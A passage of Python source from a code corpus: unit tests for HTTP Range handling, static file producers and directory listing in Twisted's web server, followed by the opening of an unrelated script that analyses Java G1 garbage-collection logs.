none of which are satisfiable.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=4-10'
contentType = "text/plain"
request.headers['range'] = 'bytes=10-12,15-20'
resource = self.makeResourceWithContent('abc', type=contentType)
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
{'content-length': '0', 'content-range': 'bytes */3'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.headers['range'] = 'bytes=1-3,100-200'
resource = self.makeResourceWithContent('abcdef')
resource.makeProducer(request, resource.openForReading())
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO.StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO.StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = 'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO.StringIO('abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = 'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO.StringIO('abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = 'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO(content), [('1', 1, 3), ('2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual('1bcd2f', ''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = '0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO(content),
[('a', 0, 2), ('b', 5, 10), ('c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
'a' + content[0:2] + 'b' + content[5:11],
content[11:15] + 'c',
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO.StringIO('abcdef'), [('', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = ('\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occured: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, 'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, 'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, 'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, 'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, 'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, 'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, 'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and C{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
"""
A single bytes range without an explicit start position is parsed into
a two-tuple of C{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader('bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.headers['range'] = 'bytes=0-43'
self.resource.render(self.request)
self.assertEqual(len(''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
"""
self.request.headers['range'] = range = 'foobar=0-43'
self.resource.render(self.request)
expected = "Ignoring malformed Range header %r" % (range,)
self._assertLogged(expected)
self.assertEqual(''.join(self.request.written), self.payload)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(
self.request.outgoingHeaders['content-length'],
str(len(self.payload)))
def parseMultipartBody(self, body, boundary):
"""
Parse C{body} as a multipart MIME response separated by C{boundary}.
Note that this with fail the calling test on certain syntactic
problems.
"""
sep = "\r\n--" + boundary
parts = ''.join(body).split(sep)
self.assertEqual('', parts[0])
self.assertEqual('--\r\n', parts[-1])
parsed_parts = []
for part in parts[1:-1]:
before, header1, header2, blank, partBody = part.split('\r\n', 4)
headers = header1 + '\n' + header2
self.assertEqual('', before)
self.assertEqual('', blank)
partContentTypeValue = re.search(
'^content-type: (.*)$', headers, re.I|re.M).group(1)
start, end, size = re.search(
'^content-range: bytes ([0-9]+)-([0-9]+)/([0-9]+)$',
headers, re.I|re.M).groups()
parsed_parts.append(
{'contentType': partContentTypeValue,
'contentRange': (start, end, size),
'body': partBody})
return parsed_parts
def test_multipleRangeRequest(self):
"""
The response to a request for multipe bytes ranges is a MIME-ish
multipart response.
"""
startEnds = [(0, 2), (20, 30), (40, 50)]
rangeHeaderValue = ','.join(["%s-%s"%(s,e) for (s, e) in startEnds])
self.request.headers['range'] = 'bytes=' + rangeHeaderValue
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
'^multipart/byteranges; boundary="(.*)"$',
self.request.outgoingHeaders['content-type']).group(1)
parts = self.parseMultipartBody(''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(self.resource.type, part['contentType'])
start, end, size = part['contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), e)
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part['body'])
def test_multipleRangeRequestWithRangeOverlappingEnd(self):
"""
The response to a request for multipe bytes ranges is a MIME-ish
multipart response, even when one of the ranged falls off the end of
the resource.
"""
startEnds = [(0, 2), (40, len(self.payload) + 10)]
rangeHeaderValue = ','.join(["%s-%s"%(s,e) for (s, e) in startEnds])
self.request.headers['range'] = 'bytes=' + rangeHeaderValue
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
boundary = re.match(
'^multipart/byteranges; boundary="(.*)"$',
self.request.outgoingHeaders['content-type']).group(1)
parts = self.parseMultipartBody(''.join(self.request.written), boundary)
self.assertEqual(len(startEnds), len(parts))
for part, (s, e) in zip(parts, startEnds):
self.assertEqual(self.resource.type, part['contentType'])
start, end, size = part['contentRange']
self.assertEqual(int(start), s)
self.assertEqual(int(end), min(e, self.resource.getFileSize()-1))
self.assertEqual(int(size), self.resource.getFileSize())
self.assertEqual(self.payload[s:e+1], part['body'])
def test_implicitEnd(self):
"""
If the end byte position is omitted, then it is treated as if the
length of the resource was specified by the end byte position.
"""
self.request.headers['range'] = 'bytes=23-'
self.resource.render(self.request)
self.assertEqual(''.join(self.request.written), self.payload[23:])
self.assertEqual(len(''.join(self.request.written)), 41)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 23-63/64')
self.assertEqual(self.request.outgoingHeaders['content-length'], '41')
def test_implicitStart(self):
"""
If the start byte position is omitted but the end byte position is
supplied, then the range is treated as requesting the last -N bytes of
the resource, where N is the end byte position.
"""
self.request.headers['range'] = 'bytes=-17'
self.resource.render(self.request)
self.assertEqual(''.join(self.request.written), self.payload[-17:])
self.assertEqual(len(''.join(self.request.written)), 17)
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 47-63/64')
self.assertEqual(self.request.outgoingHeaders['content-length'], '17')
def test_explicitRange(self):
"""
A correct response to a bytes range header request from A to B starts
with the A'th byte and ends with (including) the B'th byte. The first
byte of a page is numbered with 0.
"""
self.request.headers['range'] = 'bytes=3-43'
self.resource.render(self.request)
written = ''.join(self.request.written)
self.assertEqual(written, self.payload[3:44])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 3-43/64')
self.assertEqual(
str(len(written)), self.request.outgoingHeaders['content-length'])
def test_explicitRangeOverlappingEnd(self):
"""
A correct response to a bytes range header request from A to B when B
is past the end of the resource starts with the A'th byte and ends
with the last byte of the resource. The first byte of a page is
numbered with 0.
"""
self.request.headers['range'] = 'bytes=40-100'
self.resource.render(self.request)
written = ''.join(self.request.written)
self.assertEqual(written, self.payload[40:])
self.assertEqual(self.request.responseCode, http.PARTIAL_CONTENT)
self.assertEqual(
self.request.outgoingHeaders['content-range'], 'bytes 40-63/64')
self.assertEqual(
str(len(written)), self.request.outgoingHeaders['content-length'])
def test_statusCodeRequestedRangeNotSatisfiable(self):
"""
If a range is syntactically invalid due to the start being greater than
the end, the range header is ignored (the request is responded to as if
it were not present).
"""
self.request.headers['range'] = 'bytes=20-13'
self.resource.render(self.request)
self.assertEqual(self.request.responseCode, http.OK)
self.assertEqual(''.join(self.request.written), self.payload)
self.assertEqual(
self.request.outgoingHeaders['content-length'],
str(len(self.payload)))
def test_invalidStartBytePos(self):
"""
If a range is unsatisfiable due to the start not being less than the
length of the resource, the response is 416 (Requested range not
satisfiable) and no data is written to the response body (RFC 2616,
section 14.35.1).
"""
self.request.headers['range'] = 'bytes=67-108'
self.resource.render(self.request)
self.assertEqual(
self.request.responseCode, http.REQUESTED_RANGE_NOT_SATISFIABLE)
self.assertEqual(''.join(self.request.written), '')
self.assertEqual(self.request.outgoingHeaders['content-length'], '0')
# Sections 10.4.17 and 14.16
self.assertEqual(
self.request.outgoingHeaders['content-range'],
'bytes */%d' % (len(self.payload),))
class DirectoryListerTest(TestCase):
"""
Tests for L{static.DirectoryLister}.
"""
def _request(self, uri):
request = DummyRequest([''])
request.uri = uri
return request
def test_renderHeader(self):
"""
L{static.DirectoryLister} prints the request uri as header of the
rendered content.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
self.assertIn("<h1>Directory listing for foo</h1>", data)
self.assertIn("<title>Directory listing for foo</title>", data)
def test_renderUnquoteHeader(self):
"""
L{static.DirectoryLister} unquote the request uri before printing it.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo%20bar'))
self.assertIn("<h1>Directory listing for foo bar</h1>", data)
self.assertIn("<title>Directory listing for foo bar</title>", data)
def test_escapeHeader(self):
"""
L{static.DirectoryLister} escape "&", "<" and ">" after unquoting the
request uri.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo%26bar'))
self.assertIn("<h1>Directory listing for foo&bar</h1>", data)
self.assertIn("<title>Directory listing for foo&bar</title>", data)
def test_renderFiles(self):
"""
L{static.DirectoryLister} is able to list all the files inside a
directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1').setContent("content1")
path.child('file2').setContent("content2" * 1000)
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="file1">file1</a></td>
<td>8B</td>
<td>[text/html]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="file2">file2</a></td>
<td>7K</td>
<td>[text/html]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderDirectories(self):
"""
L{static.DirectoryLister} is able to list all the directories inside
a directory.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2 & 3').makedirs()
lister = static.DirectoryLister(path.path)
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir2%20%26%203/">dir2 & 3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_renderFiltered(self):
"""
L{static.DirectoryLister} takes a optional C{dirs} argument that
filter out the list of of directories and files printed.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('dir1').makedirs()
path.child('dir2').makedirs()
path.child('dir3').makedirs()
lister = static.DirectoryLister(path.path, dirs=["dir1", "dir3"])
data = lister.render(self._request('foo'))
body = """<tr class="odd">
<td><a href="dir1/">dir1/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>
<tr class="even">
<td><a href="dir3/">dir3/</a></td>
<td></td>
<td>[Directory]</td>
<td></td>
</tr>"""
self.assertIn(body, data)
def test_oddAndEven(self):
"""
L{static.DirectoryLister} gives an alternate class for each odd and
even rows in the table.
"""
lister = static.DirectoryLister(None)
elements = [{"href": "", "text": "", "size": "", "type": "",
"encoding": ""} for i in xrange(5)]
content = lister._buildTableContent(elements)
self.assertEqual(len(content), 5)
self.assertTrue(content[0].startswith('<tr class="odd">'))
self.assertTrue(content[1].startswith('<tr class="even">'))
self.assertTrue(content[2].startswith('<tr class="odd">'))
self.assertTrue(content[3].startswith('<tr class="even">'))
self.assertTrue(content[4].startswith('<tr class="odd">'))
def test_contentType(self):
"""
L{static.DirectoryLister} produces a MIME-type that indicates that it is
HTML, and includes its charset (UTF-8).
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
req = self._request('')
lister.render(req)
self.assertEqual(req.outgoingHeaders['content-type'],
"text/html; charset=utf-8")
def test_mimeTypeAndEncodings(self):
"""
L{static.DirectoryLister} is able to detect mimetype and encoding of
listed files.
"""
path = FilePath(self.mktemp())
path.makedirs()
path.child('file1.txt').setContent("file1")
path.child('file2.py').setContent("python")
path.child('file3.conf.gz').setContent("conf compressed")
path.child('file4.diff.bz2').setContent("diff compressed")
directory = os.listdir(path.path)
directory.sort()
contentTypes = {
".txt": "text/plain",
".py": "text/python",
".conf": "text/configuration",
".diff": "text/diff"
}
lister = static.DirectoryLister(path.path, contentTypes=contentTypes)
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [
{'encoding': '',
'href': 'file1.txt',
'size': '5B',
'text': 'file1.txt',
'type': '[text/plain]'},
{'encoding': '',
'href': 'file2.py',
'size': '6B',
'text': 'file2.py',
'type': '[text/python]'},
{'encoding': '[gzip]',
'href': 'file3.conf.gz',
'size': '15B',
'text': 'file3.conf.gz',
'type': '[text/configuration]'},
{'encoding': '[bzip2]',
'href': 'file4.diff.bz2',
'size': '15B',
'text': 'file4.diff.bz2',
'type': '[text/diff]'}])
def test_brokenSymlink(self):
"""
If on the file in the listing points to a broken symlink, it should not
be returned by L{static.DirectoryLister._getFilesAndDirectories}.
"""
path = FilePath(self.mktemp())
path.makedirs()
file1 = path.child('file1')
file1.setContent("file1")
file1.linkTo(path.child("file2"))
file1.remove()
lister = static.DirectoryLister(path.path)
directory = os.listdir(path.path)
directory.sort()
dirs, files = lister._getFilesAndDirectories(directory)
self.assertEqual(dirs, [])
self.assertEqual(files, [])
if getattr(os, "symlink", None) is None:
test_brokenSymlink.skip = "No symlink support"
def test_childrenNotFound(self):
"""
Any child resource of L{static.DirectoryLister} renders an HTTP
I{NOT FOUND} response code.
"""
path = FilePath(self.mktemp())
path.makedirs()
lister = static.DirectoryLister(path.path)
request = self._request('')
child = resource.getChildForRequest(lister, request)
result = _render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, http.NOT_FOUND)
result.addCallback(cbRendered)
return result
def test_repr(self):
"""
L{static.DirectoryLister.__repr__} gives the path of the lister.
"""
path = FilePath(self.mktemp())
lister = static.DirectoryLister(path.path)
self.assertEqual(repr(lister),
"<DirectoryLister of %r>" % (path.path,))
self.assertEqual(str(lister),
"<DirectoryLister of %r>" % (path.path,))
def test_formatFileSize(self):
"""
L{static.formatFileSize} format an amount of bytes into a more readable
format.
"""
self.assertEqual(static.formatFileSize(0), "0B")
self.assertEqual(static.formatFileSize(123), "123B")
self.assertEqual(static.formatFileSize(4567), "4K")
self.assertEqual(static.formatFileSize(8900000), "8M")
self.assertEqual(static.formatFileSize(1234000000), "1G")
self.assertEqual(static.formatFileSize(1234567890000), "1149G")
class LoadMimeTypesTests(TestCase):
"""
Tests for the MIME type loading routine.
@cvar UNSET: A sentinel to signify that C{self.paths} has not been set by
the mock init.
"""
UNSET = object()
def setUp(self):
self.paths = self.UNSET
def _fakeInit(self, paths):
"""
A mock L{mimetypes.init} that records the value of the passed C{paths}
argument.
@param paths: The paths that will be recorded.
"""
self.paths = paths
def test_defaultArgumentIsNone(self):
"""
By default, C{None} is passed to C{mimetypes.init}.
"""
static.loadMimeTypes(init=self._fakeInit)
self.assertIdentical(self.paths, None)
def test_extraLocationsWork(self):
"""
Passed MIME type files are passed to C{mimetypes.init}.
"""
paths = ["x", "y", "z"]
static.loadMimeTypes(paths, init=self._fakeInit)
self.assertIdentical(self.paths, paths)
def test_usesGlobalInitFunction(self):
"""
By default, C{mimetypes.init} is called.
"""
# Checking mimetypes.inited doesn't always work, because
# something, somewhere, calls mimetypes.init. Yay global
# mutable state :)
args, _, _, defaults = inspect.getargspec(static.loadMimeTypes)
defaultInit = defaults[args.index("init")]
self.assertIdentical(defaultInit, mimetypes.init)
| bsd-3-clause |
lichengwu/python_tools | utils/cn/lichengwu/utils/utils/gc/G1LogUtil.py | 1 | 7950 | # coding=utf-8
__author__ = 'lichengwu'
import datetime
import re
'''
Garbage First Log Analyse Util
'''
class G1LogUtil:
__path = ''
# some regular expression pattern
# like this '2012-12-19T10:25:19'
__START_LINE_PATTERN = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:.*pause.*')
# like this '112M(112M)->0B(112M)'
__MEMORY_INFO_PATTERN = re.compile('(\d+)([M|B|K|G])\((\d+)([M|B|K|G])\)->(\d+)([M|B|K|G])\((\d+)([M|B|K|G])\)')
# like this '16M->16M'
__SIMPLE_MEMORY_INFO_PATTERN = re.compile('(\d+)([M|B|K|G])->(\d+)([M|B|K|G])')
# constructor
def __init__(self, path):
self.__path = path
"""
analyse G1 log for java
"""
def analyse(self):
# get log reader
reader = self.__reader(self.__path)
# number of GC times
gc_count = 0
gc_count_young = 0
gc_count_mixed = 0
# total stop the world time
total_stop_time = 0.000000
# max heap size
max_heap_size = 0
# min heap size
min_heap_size = 0xEFFFFFFFFFFFFFFFF
# max eden size
max_eden_size = 0
# min eden size
min_eden_size = 0xEFFFFFFFFFFFFFFFF
# survivor size
survivor_size = None
# total eden size for statistics
total_eden_size = 0
# map store memory info
memory_usage_map = {'young_garbage_percent': [], 'heap_garbage_percent': [], 'young_usage_percent': [],
'heap_usage_percent': []}
#log start time
start_time = None
# log end time
finish_time = None
# gc work thread count
gc_work_thread_number = None
each_line = reader.next()
while each_line:
if self.__is_start_line(each_line):
token = each_line.split(' ')
if 'initial-mark' in each_line:
total_stop_time += float(token[6])
else:
total_stop_time += float(token[5])
if start_time is None:
start_time = self.__get_datetime(token[0])
finish_time = token[0]
gc_count += 1
gc_type = token[4][1:-2]
if gc_type == 'young':
gc_count_young += 1
elif gc_type == 'mixed':
gc_count_mixed += 1
elif each_line.find(' [Eden:') == 0:
'''
parse memory info
'''
memory_info = each_line.split(' ')
eden_info = self.__parse_memory_info(memory_info[4])
survivor_info = self.__parse_memory_info(memory_info[6])
if survivor_size is None:
survivor_size = survivor_info[1]
heap_info = self.__parse_memory_info(memory_info[8])
max_heap_size = max(max_heap_size, heap_info[1])
min_heap_size = min(heap_info[1], min_heap_size)
# garbage (heap) / before gc (heap)
memory_usage_map['heap_garbage_percent'].append(float(heap_info[0] - heap_info[2]) / heap_info[0])
# before gc (heap) / heap size
memory_usage_map['heap_usage_percent'].append(float(heap_info[0]) / heap_info[1])
max_eden_size = max(max_eden_size, eden_info[1])
min_eden_size = min(eden_info[1], min_eden_size)
# garbage (eden+survivor) / before gc (eden+survivor)
memory_usage_map['young_garbage_percent'].append(
float(eden_info[0] + survivor_info[0] - eden_info[2] - survivor_info[1]) / (
eden_info[0] + survivor_info[0]))
# before gc(eden+survivor) / eden+survivor*2
memory_usage_map['young_usage_percent'].append(
float(eden_info[0] + survivor_info[0]) / (eden_info[1] + survivor_info[1] * 2))
total_eden_size += eden_info[1]
elif gc_work_thread_number is None and each_line.find(' [GC Worker Start') == 0:
gc_work_thread_number = len(each_line.strip().split(' ')) - 1
each_line = reader.next()
finish_time = self.__get_datetime(finish_time)
reader.close()
print '''G1 log Time:
[%s] - [%s]''' % (
start_time.strftime('%Y-%m-%d %H:%M:%S'), finish_time.strftime('%Y-%m-%d %H:%M:%S'))
summary = '''Memory Info:
Min Heap Size\t= %sM
Max Heap Size\t= %sM
Min Eden Size\t= %sM
Max Eden Size\t= %sM
Avg Eden Size\t= %sM
Survivor Size\t= %sM''' % (
(max_heap_size / 1024), (min_heap_size / 1024), (max_eden_size / 1024), (min_eden_size / 1023),
(total_eden_size / gc_count / 1024), survivor_size / 1024)
print summary
gc_info = '''GC Info:
GC Work Threads\t= %s
Avg Stop Time\t= %.2fms
GC Throughput\t= %.2f%%
''' % (gc_work_thread_number, (total_stop_time * 1000 / gc_count),
total_stop_time * 100 / (finish_time - start_time).total_seconds())
gc_info += '''GC(yong) Times\t= %s
GC(mixed) Times\t= %s
Total GC Times\t= %s
''' % (gc_count_young, gc_count_mixed, gc_count)
gc_info += '''Avg Yong Generation Garbage Rate\t= %.2f%%
Avg Heap Garbage Rate\t= %.2f%%
''' % (sum(memory_usage_map['young_garbage_percent']) * 100 / len(memory_usage_map['young_garbage_percent']),
sum(memory_usage_map['heap_garbage_percent']) * 100 / len(memory_usage_map['heap_garbage_percent']))
gc_info += '''Avg Max Young Generation Usage Rate\t=%.2f%%
Avg Max Heap Usage Rate\t=%.2f%%
''' % (sum(memory_usage_map['young_usage_percent']) * 100 / len(memory_usage_map['young_garbage_percent']),
sum(memory_usage_map['heap_usage_percent']) * 100 / len(memory_usage_map['heap_usage_percent']))
print gc_info
# get datetime from header line
def __get_datetime(self, str):
# time like this '2012-12-12T19:01:28.610'
datetime_string = str
if len(str) > 23:
datetime_string = str[0:23]
return datetime.datetime.strptime(datetime_string, '%Y-%m-%dT%H:%M:%S.%f')
# test if the line is g1 log start line
def __is_start_line(self, line):
